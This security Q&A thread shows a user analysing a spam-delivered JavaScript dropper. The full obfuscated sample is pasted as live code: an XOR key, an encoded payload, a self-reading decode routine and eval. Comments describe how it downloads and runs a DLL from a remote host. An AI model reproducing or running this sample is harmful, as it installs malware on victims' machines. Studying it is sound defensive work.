How to de-obfuscate a malicious payload?

Question

I've received some spam email that led to a JavaScript file which I assume is malicious.

My curiosity got the best of me so I opened the file in notepad and I'm trying to make sense of the code but I cannot decypher the PDF and hex parts.

I suppose the objective of the script is to generate a malicious PDF file using Microsoft's VB Script which is embedded in all Internet Explorers, being disabled by default on most recent versions but still available.

Here's the script:

'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';
var _0x8d0b=["\x7C","\x73\x70\x6C\x69\x74","","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6A\x6F\x69\x6E"];function decode(_0x39f5x2,_0x39f5x3){var _0x39f5x4=_0x39f5x3[_0x8d0b[1]](_0x8d0b[0]);var _0x39f5x5=_0x8d0b[2];function _0x39f5x6(_0x39f5x7,_0x39f5x8){var _0x39f5x9=_0x39f5x7^ _0x39f5x2[_0x8d0b[5]](Math[_0x8d0b[4]](_0x39f5x8% _0x39f5x2[_0x8d0b[3]]));_0x39f5x4[_0x39f5x8]= String[_0x8d0b[6]](_0x39f5x9)}for(var _0x39f5x8=0;_0x39f5x8< _0x39f5x4[_0x8d0b[3]];_0x39f5x8++){var _0x39f5x7=_0x39f5x4[_0x39f5x8];_0x39f5x6(_0x39f5x7,_0x39f5x8)};return _0x39f5x4[_0x8d0b[7]](_0x8d0b[2])}
var stream = WScript.CreateObject('ADODB.Stream');
var code = "15|15|20|23|50|39|91|87|60|77|31|3|36|38|118|127|84|16|30|0|58|33|94|107|124|13|109|25|103|94|43|108|70|79|108|90|40|27|29|37|20|35|50|109|38|53|7|54|16|112|55|85|112|67|35|61|110|104|66|100|46|55|58|84|115|19|54|104|83|89|80|64|42|65|10|45|55|33|33|91|26|106|40|62|67|98|93|106|96|21|45|37|2|54|9|115|16|55|7|32|29|63|65|92|44|26|34|7|31|18|45|51|44|44|84|5|27|127|35|33|11|19|5|44|23|55|2|120|123|61|23|41|109|99|124|22|34|68|110|22|85|35|17|2|47|28|29|36|2|25|121|101|58|111|74|97|93|58|72|14|78|67|68|79|48|64|87|122|26|63|1|121|72|89|27|31|52|47|24|18|23|83|107|120|116|88|78|122|108|114|113|44|37|28|5|106|5|26|31|3|16|14|120|64|117|111|80|65|91|85|98|58|23|65|94|40|29|77|124|31|16|0|12|36|27|118|21|68|102|83|81|124|69|17|53|46|8|61|24|17|105|22|17|23|21|2|118|95|61|109|49|70|104|18|3|2|82|56|8|109|7|24|67|0|12|43|51|13|89|10|29|90|79|61|92|111|96|72|123|97|47|10|80|18|44|40|56|86|99|63|61|34|13|1|21|17|71|2|35|40|53|1|39|46|4|70|79|77|113|123|26|127|102|98|115|102|72|52|4|63|65|9|113|95|69|10|47|66|13|90|39|31|71|48|75|95|80|76|108|33|9|6|0|99|65|96|121|10|22|110|73|126|82|64|85|78|106|91|95|107|81|18|66|20|50|41|30|71|28|58|71|87|109|4|85|19|43|88|111|75|18|5|52|28|84|36|56|66|53|34|98|5|109|6|86|43|85|63|46|13|87|94|78|102|126|42|93|66|101|68|71|86|122|83|93|24|17|2|17|3|17|102|5|38|70|25|115|67|79|119|27|39|6|31|10|86|24|19|24|32|52|22|31|83|51|51|94|44|10|101|5|66|82|4|29|21|0|1|54|47|67|42|75|36|28|57|58|48|4|55|18|57|63|78|26|27|120|71|78|81|95|82|120|76|97|84|81|90|68|12|86|9|66|84|17|63|46|32|21|64|28|122|47|121|48|33|39|63|1|10|53|42|56|18|28|4|20|21|88|118|44|33|37|5|11|66|63|87|95|121|38|22|85|24|62|6|56|13|67|40|65|31|26|58|47|1|35|1|2|126|121|69|13|92|99|93|69|76|111|101|104|14|106|51|91|58|107|71|69|70|106|95|111|93|74|75|82|66|6|19|61|37|31|41|114|36|25|63|63|111|18|7|32|35|102|57|88|92|63|80|100|47|125|65|122|124|80|99|55|24|4|109|89|102|23|56|6|87|35|0|38|55|110|17|26|110|70|94|74|100|21|92|38|2|14|90|53|44|55|26|53|71|74|98|72|106|12|97|115|77|113|86|114|77|120|51|10|70|89|36|15|28|69|28|126|85|116|120|51|76|35|3|35|29|14|81|93|77|54|106|67|14|29|27|87|59|85|64|90|124|105|92|106|121|72|121|82|83|79|112|69|20|102|99|114|116|107|31|3|38|58|20|69|3|11|97|23|13|122|72|78|113|35|25|35|16|39|15|39|37|62|54|0|7|127|17|88|37|39|49|2|15|45|35|69|103|0|120|97|49|24|41|7|53|34|57|38|124|117|69|108|9|87|121|57|67|24|21|16|19|99|97|83|69|111|102|89|59|43|13|37|65|37|33|116|49|37|10|49|1|111|27|39|37|86|31|119|121|111|112|112|18|96|90|68|81|80|86|18|126|40|82|124|72|40|17|8|45|69|58|53|15|77|15|2|44|23|124|1|122|95|80|66|101|24|49|58|108|50|18|77|85|53|16|87|107|84|46|57|53|2|74|92|15|22|5|59|121|29|55|13|65|20|5|109|10|115|75|115|76|74|44|88|67|4|48|98|14|46|86|111|114|93|95|48|31|34|3|121|28|12|11|76|41|33|100|85|84|84|23|15|87|101|83|58|79|46|35|42|114|69|32|69|16|31|15|126|65|68|57|107|98|11|12|12|14|33|86|85|44|32|36|24|81|10|73|33|24|71|123|124|98|122|127|49|127|7|80|74|77|90|27|25|97|126|72|102|18|24|13|29|55|92|60|28|60|6|17|94|35|21|13|3|41|46|90|18|38|53|55|63|122|6|32|108|49|72|0|3|37|2|17|49|95|68|82|94|106|29|97|73|59|121|64|75|112|106|26|93|54|25|65|22|111|68|18|24|66|37|51|114|116|124|62|127|77|124|90|77|83|71|105|52|57|61|88|111|68|82|26|26|33|46|8|63|34|31|101|50|126|63|64|97|106|125|98|83|47|59|47|50|54|32|25|26|16|95|63|111|124|60|124|100|55|24|16|16|18|51|15|39|117|95|116|28|43|60|27|76|89|91|49|111|25|121|17|77|29|27|89|6|10|116|2|23|56|91|99|47|84|120|65|22|3|53|45|38|13|8|108|23|38|15|15|18|65|19|52|16|53|46|59|18|58|55|3|14|114|87|72|110|122|94|98|56|78|114|17|88|33|33|59|5|53|11|122|35|69|72|101|96|122|101|17|18|95|99|71|84|67|48|34|60|16|108|60|93|101|90|110|101|112|98|42|57|5|9|36|47|9|87|65|105|41|43|30|83|91|57|97|61|76|69|95|71|22|121|104|76|88|88|100|60|84|58|35|98|80|23|42|21|89|83|21|28|59|26|65|49|22|124|19|123|74|58|123|113|123|92|80|102|76|87|100|113|83|22|70|81|24|17|58|86|103|6|32|88|26|39|91|39|62|36|26|66|75|118|56|64|108|125|112|99|17|122|108|80|97|106|107|68|86|38|31|31|106|4|9|63|66|112|111|98|1|32|35|67|47|102|2|81|61|14|126|113|87|67|79|122|56|71|121|65|104|16|83|72|110|67|82|52|0|51|97|3|38|98|114|119|10|27|1|53|55|12|33|47|27|32|115|5|121|86|108|74|107|67|48|104|111|120|89|18|59|96|57|121|49|81|74|77|111|65|20|90|30|66|24|28|54|0|118|9|62|86|20|35|124|68|100|92|125|114|89|20|121|63|44|58|53|65|49|39|41|72|111|67|9|57|28|86|43|41|43|66|15|119|76|57|110|90|113|107|71|102|108|22|24|19|88|12|32|100|108|78|6|20|3|98|9|15|73|76|71|77|96|82|66|62|59|112|117|79|117|101|81|23|18|53|88|27|122|119|86|17|23|63|25|54|58|80|121|76|104|109|103|102|103|24|80|25|74|69|68|19|88|70|51|63|43|22|100|25|53|53|100|111|26|70|2|32|7|38|88|126|68|7|72|101|110|61|70|60|104|120|79|122|66|115|84|85|70|31|20|85|43|75|58|120|1|0|83|53|75|39|18|25|11|43|35|7|70|114|69|77|52|22|20|16|74|55|4|34|21|74|100|60|71|68|48|82|72|75|90|81|104|74|117|56|43|2|3|44|90|25|44|43|97|71|19|106|19|95|37|39|38|25|57|39|19|122|71|27|43|41|119|53|64|125|106|104|70|115|19|111|115|74|116|82|65|35|70|71|4|95|75|1|42|60|63|25|122|17|8|102|100|67|106|122|38|44|24|29|35|33|43|14|27|45|11|12|93|94|90|103|94|74|59|74|80|78|17|53|93|126|89|102|97|123|73|89|122|23|104|97|18|60|42|6|33|62|48|62|22|56|72|102|109|67|77|21|66|82|49|38|54|46|45|46|33|39|86|98|7|38|59|16|67|49|72|107|107|121|94|83|67|22|77|116|109|68|85|0|33|94|87|44|119|61|3|21|93|109|27|30|17|19|63|28|100|123|73|121|93|108|105|79|125|115|117|74|80|109|77|98|85|19|42|38|7|21|48|70|29|43|23|64|86|25|122|32|63|85|2|29|34|21|98|95|100|85|66|53|21|3|1|34|8|39|84|106|59|107|127|62|112|18|72|116|111|90|90|65|116|7|39|9|33|30|72|6|49|39|121|114|42|103|40|50|84|22|99|64|10|62|123|49|72|48|83|25|25|81|122|66|75|87|35|38|53|49|28|116|25|47|21|112|26|44|98|25|90|50|33|60|20|61|14|11|40|61|35|76|28|1|33|48|107|111|116|108|91|120|77|73|21|98|110|31|71|101|98|49|112|72|117|87|105|90|74|104|98|16|39|66|47|52|37|91|46|78|62|58|112|64|83|116|65|86|48|25|0|1|29|43|27|90|64|84|49|31|55|28|72|67|123|69|103|79|113|80|99|68|120|104|119|86|37|34|13|39|111|122|28|13|3|5|116|14|101|22|42|59|87|85|113|23|112|80|102|123|78|127|74|72|115|24|19|103|22|101|118|28|10|32|17|98|18|34|11|40|8|112|30|68|37|81|46|4|66|54|53|111|124|68|117|57|67|74|87|54|53|30|58|21|112|125|100|65|110|112|74|90|122|76|81|18|112|75|16|35|33|19|17|78|59|114|107|114|83|41|116|102|58|14|48|46|56|2|11|5|64|81|46|42|8|84|127|108|68|102|80|115|57|108|106|103|117|103|119|108|83|48|9|6|83|98|64|97|0|54|98|109|107|111|57|6|27|44|6|37|89|94|85|10|75|114|99|85|75|113|99|97|108|118|79|103|24|81|67|67|61|12|57|42|1|99|50|34|49|87|119|45|24|23|45|78|2|23|43|13|58|45|12|27|17|26|9|50|84|72|82|107|94|92|68|103|99|92|83|90|77|77|76|74|73|83|126|77|75|19|112|69|108|104|108|79|52|89|93|65|6|85|109|57|70|113|73|86|114|66|62|13|34|11|13|58|12|57|123|93|3|117|82|79|92|93|102|108|83|89|87|107|113|105|37|92|42|16|111|116|15|53|97|101|54|27|42|10|37|26|23|98|98|65|64|61|81|112|58|114|101|106|25|44|66|109|109|90|100|83|67|110|50|65|68|93|66|80|102|18|69|107|65|127|62|68|92|76|94|101|20|42|115|1|112|12|113|7|38|1|47|4|16|62|22|102|77|25|92|58|60|70|120|75|108|118|65|57|81|10|105|97|110|45|11|75|22|20|75|14|103|59|61|57|80|31|60|45|8|24|126|45|100|22|96|43|47|62|114|13|28|100|33|37|22|22|57|9|120|83|92|126|90|74|84|120|49|17|1|42|98|67|32|46|56|7|110|52|25|119|88|54|22|59|11|116|21|107|87|61|18|26|56|107|115|57|60|27|33|18|122|103|110|40|97|27|30|85|26|87|96|50|68|64|76|111|70|108|90|86|6|7|40|56|25|104|55|35|8|112|118|54|27|53|5|38|27|82|75|46|12|31|104|79|120|13|16|15|0|7|42|43|38|56|21|119|14|25|119|46|23|14|63|52|89|84|87|101|96|62|78|113|77|81|14|15|14|71|35|74|47|114|51|120|99|51|93|56|1|10|29|93|94|111|78|75|60|77|49|115|99|119|67|109|45|46|114|68|38|40|39|42|19|62|119|43|89|107|24|111|29|58|44|22|54|43|118|121|101|81|69|2|125|81|76|95|109|99|118|90|19|114|82|109|67|65|20|87|38|30|38|1|70|45|44|46|41|45|75|94|125|68|126|65|91|106|113|80|77|28|6|95|60|48|27|30|120|31|70|73|8|33|66|20|78|38|27|26|64|1|16|24|121|1|121|119|10|79|0|41|33|26|25|37|50|55|35|42|42|48|71|8|59|79|102|91|87|73|116|119|70|46|16|31|37|45|78|36|6|62|36|49|123|2|54|23|119|110|14|10|63|96|88|76|5|68|60|71|101|74|123|45|7|22|113|117|19|30|56|5|17|2|48|42|63|109|28|89|27|43|25|58|100|79|59|104|115|0|87|49|116|68|70|48|61|50|4|119|5|19|87|31|49|105|41|62|59|36|39|56|60|71|101|29|28|26|96|102|111|99|79|52|3|53|18|50|14|88|76|80|56|111|84|77|114|28|8|0|19|3|56|92|49|74|89|99|19|50|121|97|24|43|75|94|24|14|53|33|33|63|22|27|85|43|75|70|60|59|95|25|105|16|114|18|83|4|79|1|22|64|104|83|89|38|46|56|32|48|0|35|2|126|0|88|0|11|121|55|49|3|17|66|36|126|82|86|67|0|97|100|100|69|91|66|118|121|91|101|72|23|68|80|84|25|46|24|87|31|48|40|66|120|101|87|22|67|12|73|41|42|7|65|13|9|54|45|18|56|77|96|31|111|122|124|63|121|16|82|22|82|69|36|5|90|52|51|32|37|14|99|102|104|99|84|83|110|101|0|59|59|80|17|85|54|98|93|111|73|92|81|81|67|106|23|78|3|71|61|23|38|93|45|84|106|106|16|13|27|32|127|81|111|89|65|81|21|104|116|66|93|32|23|67|85|110|2|16|53|18|38|24|48|6|51|96|54|91|57|70|89|5|54|34|66|85|56|76|111|70|99|85|81|73|18|18|57|5|110|76|97|82|51|28|24|111|32|65|47|35|68|4|122|121|30|15|53|60|124|102|104|126|65|120|73|101|54|92|37|27|0|59|121|114|15|2|17|44|22|14|78|37|3|56|120|59|82|10|40|72|53|44|31|71|13|88|42|11|50|111|17|86|46|17|55|64|2|110|121|120|94|62|21|52|82|109|126|23|11|62|121|114|15|86|45|65|36|32|31|49|45|35|90|64|63|84|97|122|122|77|74|71|71|66|78|44|94|93|104|103|92|69|1|21|41|14|13|22|60|109|31|101|56|11|33|22|40|110|86|98|125|24|104|18|72|103|118|112|82|35|4|36|123|38|121|21|110|47|53|48|47|97|84|100|55|20|5|3|0|27|37|109|20|48|51|84|114|38|99|19|21|58|10|18|21|58|111|110|33|25|113|2|38|20|17|45|17|45|56|43|22|48|23|96|109|29|124|110|109|33|31|62|51|17|22|35|30|25|15|31|63|86|50|24|35|37|54|12|42|123|6|37|82|89|100|75|86|8|14|53|5|10|126|45|103|6|103|14|13|9|111|51|16|99|125|9|14|16|28|63|121|30|126|95|89|66|4|52|82|28|21|35|48|105|69|17|13|47|61|14|54|11|42|16|8|39|12|38|39|11|11|15|46|27|6|26|34|32|29|58|19|27|82|13|31|35|58|20|6|38|52|93|95|28|38|27|102|35|4|14|0|32|23|84|29|56|22|15|114|1|63|20|36|42|33|62|17|6|4|39|23|57|49|105|10|88|54|31|4|1|84|5|32|19|35|97|93|48|91|18|24|5|60|97|100|37|108|110|26|77|58|104|89|58|91|123|5|62|118|5|48|26|34|65|20|14|24|47|38|100|60|2|102|3|56|105|19|48|74|87|12|101|112|37|120|22|23|47|53|106|35|18|123|35|43|21|109|17|91|36|51|9|68|9|124|17|121|0|30|58|93|112|43|14|6|0|45|35|34|64|30|19|11|46|6|106|105|42|105|102|44|32|91|21|15|126|7|33|59|45|98|109|124|84|109|64|25|115|72|109|94|66|112|74|100|111|31|34|122|1|37|8|7|50|60|8|19|29|44|28|62|53|110|30|15|19|59|29|42|99|19|83|94|118|95|109|11|12|14|74|61|109|31|75|59|66|67|70|115|106|17|72|19|109|121|115|7|55|11|122|29|47|0|30|90|123|78|104|75|126|78|62|77|112|18|102|73|87|97|79|63|71|124|96|101|76|73|77|9|120|2|50|43|58|13|107|56|29|3|31|41|111|21|51|109|37|37|1|74|55|102|74|16|52|30|25|18|44|28|108|113|17|0|11|29|49|123|27|99|113|113|10|12|65|47|108|112|36|6|23|47|30|63|75|61|100|58|40|41|77|7|40|65|35|120|5|104|60|10|127|58|94|74|127|112|78|110|94|95|103|113|84|118|65|19|27|58|38|24|39|44|120|101|26|56|39|97|64|58|108|112|51|53|11|89|114|51|83|115|107|9|29|44|51|24|54|35|21|50|38|27|60|17|64|42|26|84|58|24|38|75|40|98|53|58|32|48|25|117|61|103|31|38|39|32|60|110|109|34|107|100|26|55|64|10|90|31|22|35|61|70|24|67|27|105|124|46|103|43|93|80|88|63|76|60|93|121|65|25|18|119|61|31|56|2|28|108|96|6|36|124|20|57|111|63|20|67|12|10|35|69|99|59|68|120|77|36|5|60|115|52|8|9|120|24|25|24|43|2|108|110|42|22|29|29|56|97|122|19|96|37|46|59|16|31|105|26|7|49|17|3|56|70|106|104|90|100|27|31|75|40|92|56|69|37|40|77|25|85|44|67|101|25|87|14|70|108|95|109|92|102|96|111|83|65|110|61|15|29|40|52|1|56|122|101|48|40|7|21|67|40|43|84|31|114|63|86|123|13|121|116|108|115|40|1|1|9|2|110|16|22|7|122|5|56|118|62|50|69|29|31|39|102|58|123|0|40|43|16|53|3|110|80|58|60|14|42|56|85|63|10|100|29|122|33|17|101|65|29|57|62|32|3|29|64|42|19|30|53|7|41|31|122|62|94|97|111|58|109|20|113|86|48|14|54|49|17|61|25|107|109|51|15|11|56|118|110|26|81|52|15|28|112|27|20|85|10|105|32|0|122|56|54|15|9|90|50|24|15|11|34|101|5|34|112|18|61|53|114|109|64|45|20|8|6|23|34|54|68|36|55|19|32|43|71|4|19|112|35|120|57|86|110|25|43|25|15|91|14|76|85|31|116|89|15|10|20|69|97|85|127|106|76|107|71|115|116|72|69|103|101|89|82|89|103|19|63|127|37|121|3|58|18|5|62|126|24|55|97|27|51|17|58|36|26|102|91|109|69|78|88|36|124|25|36|40|13|2|16|25|44|112|46|11|99|11|106|111|54|22|4|74|15|55|82|110|79|123|78|121|37|35|32|21|23|50|38|27|23|111|96|94|65|84|60|15|0|45|67|51|82|37|81|16|79|108|113|40|122|11|118|34|16|100|0|13|12|41|6|67|50|40|26|53|119|106|106|22|110|82|78|120|107|87|85|71|113|118|66|81|18|107|115|24|9|46|38|120|8|69|63|25|125|34|96|96|37|8|73|37|54|1|91|27|28|118|11|102|62|31|23|1|43|127|30|16|30|18|127|59|100|71|16|12|115|6|9|62|121|69|43|116|0|33|14|10|31|16|112|3|28|100|51|40|11|17|41|62|12|106|6|32|63|40|98|20|40|49|109|15|20|37|6|99|45|31|36|14|62|16|121|91|21|21|8|33|19|109|86|46|43|71|110|93|99|69|121|98|90|126|113|12|42|60|112|25|6|31|122|3|38|17|32|18|86|44|33|70|4|55|58|5|17|57|114|118|110|65|116|11|5|48|22|31|18|100|24|22|44|29|28|91|59|111|107|58|35|122|122|23|22|122|55|81|92|127|76|119|83|74|110|59|77|115|67|118|112|57|26|23|106|115|26|5|45|5|57|49|117|5|56|127|29|58|118|17|55|109|19|9|33|82|27|15|29|13|8|9|2|2|39|35|44|3|24|6|17|92|49|5|31|47|6|30|11|83|3|24|125|124|2|67|44|31|70|53|16|103|107|79|15|120|108|81|72|121|113|78|49|76|69|106|102|81|109|72|61|94|96|30|10|14|22|48|22|37|35|107|68|90|57|69|120|117|88|67|77|108|49|21|106|125|79|96|65|23|76|89|100|88|86|114|77|120|117|69|20|54|30|33|44|36|57|24|71|26|12|19|60|17|83|25|51|65|98|114|107|112|19|46|125|112|5|87|52|70|81|116|40|37|81|36|32|73|51|20|21|4|17|41|111|100|22|6|29|7|56|73|18|18|109|49|20|24|1|23|13|115|88|126|91|79|97|77|69|106|74|105|113|109|77|16|122|113|82|16|3|25|61|47|42|4|57|19|26|61|24|3|22|85|39|40|101|31|26|17|118|25|83|101|15|122|52|124|5|122|116|124|104|76|62|39|44|3|21|114|111|2|74|3|113|6|109|9|109|22|43|13|9|25|97|70|48|56|13|14|53|41|34|91|58|24|30|2|11|123|41|28|18|46|49|20|89|108|57|59|96|91|60|51|15|77|73|76|103|84|124|83|76|88|83|70|102|103|112|104|108|112|75|25|16|79|57|30|48|92|13|20|14|33|37|125|53|64|51|7|24|126|63|115|111|19|116|100|60|18|69|28|24|30|70|123|106|88|108|98|117|83|77|66|113|93|95|126|37|12|51|24|34|50|90|108|17|28|8|59|86|46|107|22|14|34|10|17|27|19|127|5|114|116|13|120|114|55|126|21|88|49|4|30|14|58|87|37|48|112|46|120|27|122|97|49|16|10|100|66|58|76|114|81|72|83|86|24|127|124|60|92|78|87|3|17|13|15|39|119|39|38|63|81|5|38|19|34|0|73|15|109|96|49|15|62|123|105|47|75|74|77|77|83|58|72|116|100|115|76|121|108|118|121|88|76|126|110|106|97|74|73|57|37|69|23|34|106|28|74|19|69|79|102|58|113|50|59|125|98|74|114|74|67|116|124|62|4|85|36|34|53|52|110|12|43|34|45|59|25|95|57|101|121|72|39|72|120|56|95|37|58|95|21|107|0|23|38|61|0|118|123|110|37|47|60|4|12|8|89|40|76|14|76|15|79|109|89|64|82|88|103|84|32|51|4|109|11|119|102|81|20|96|100|92|81|1|56|82|95|88|71|84|76|96|51|99|99|91|82|119|80|88|101|67|97|97|72|65|83|30|57|61|96|91|29|97|20|55|7|35|97|88|49|42|18|53|57|125|113|7|77|72|110";
stream.Type = 2;
stream.Charset = 'us-ascii';
stream.Open();
stream.LoadFromFile(WScript.ScriptFullName);
stream.Position = 0;
var text = stream.ReadText(3669);
var decoded = decode(text, code);
eval(decoded);

What does it do?

It seems like the deobfuscated code would be in the `decoded` variable. Remove the last `eval` and dump that variable instead. I would still do it in a VM just in case somehow the decode function could execute the malicious code. — André Borie, Jun 26 '16 at 02:27
Not only should it be run in a VM but you should make sure that VM has no network access! — Julie Pelletier, Jun 26 '16 at 04:40
And please avoid putting others at risk with your desire to investigate malware. This is not the type of thing that should be shared anywhere! — Julie Pelletier, Jun 26 '16 at 04:45
I got far enough to find that it sends a request to `dmnhulie.xyz/?...` where the `...` contains version information and a host fingerprint. That gets a response containing an ID which is sent in a second request to the same host, which gets back a response that's a DLL and then the script tries to `rundll32` it with `WScript.Shell`. It contains the string `Crypter.dll` which gives a clue to what it would do if successful. The obfuscation is just a bunch of xor'ing things at the right offsets. Nothing about the Javascript is interesting. It's just a downloader for the real nasty stuff, the DLL — , Jun 26 '16 at 05:39
The DLL I got is identical to the one described here: https://www.virustotal.com/en/file/b13e274e8c191671fe58127b3d9461df16e10acc3ff02e698119e1e8eabd924e/analysis/ — , Jun 26 '16 at 06:18
Thank you, @WumpusQ.Wumbley for the information! I'll report the website I got this from to the Kaspersky Security Team and I would ask you to write it down as a answer so I can approve it. Sorry, I do not want to harm anyone. I thought that, since it's a JS, no one should be at harm unless they willingly execute this code in a vulnerable Internet Explorer. — Zeh, Jun 26 '16 at 15:18

score 7 · Accepted Answer · answered Jun 26 '16 at 16:37

The first line 'iayQS28R... is a key to be XORed with the bytes given in the code variable. When interpreted by Javascript, it does nothing because it's just a string constant. But the script opens its own source file (something you can't do in pure Javascript, but you can with the extra packages that are available when Windows runs a Javascript script as a standalone program). When it reads its own source (the first 3669 bytes - which happens to be the length of the first line) the apostrophes and semicolon are included, so the first value in code (15) is XORed with the character code of the ' (39) to give 40, and the next value (also 15) is XORed with the character code of the i (105) to give 102, and so on. 40 and 102 are the character codes of ( and f. The decoded text starts with (function(GLOBAL, HOST, ID, V){.

